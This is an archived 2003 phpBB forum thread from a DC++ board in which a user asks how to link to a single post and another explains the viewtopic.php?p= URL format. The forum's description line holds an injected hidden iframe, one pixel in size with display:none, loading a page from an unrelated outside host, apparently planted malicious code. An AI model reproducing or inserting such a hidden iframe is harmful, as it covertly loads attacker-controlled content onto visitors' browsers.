Linking to a post within a thread?

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Locked
Gratch06
Posts: 141
Joined: 2003-05-25 01:48
Location: USA

Linking to a post within a thread?

Post by Gratch06 » 2003-06-11 00:37

I'm fairly new to the phpBB setup, so forgive me if this is something simple...Is there a way to link to a post within a thread? i.e. if I want to link someone to the third post down on a certain thread, but they don't necessarily need to see the first one as the 3rd one has the info pertinent to them. I don't mind editing URL's to get this result, just need to know what to edit them from/to.

Thanks
- Gratch

sarf
Posts: 382
Joined: 2003-01-24 05:43
Location: Sweden
Contact:

Post by sarf » 2003-06-11 03:21

Get the number of the post by checking its quote-button URL.
You can simply use this :

Code: Select all

http://dcplusplus.sourceforge.net/forum/viewtopic.php?p=<QUOTED_POST_NUMBER>#<QUOTED_POST_NUMBER>
Sarf
---
I need someone real bad. Are you real bad?

Locked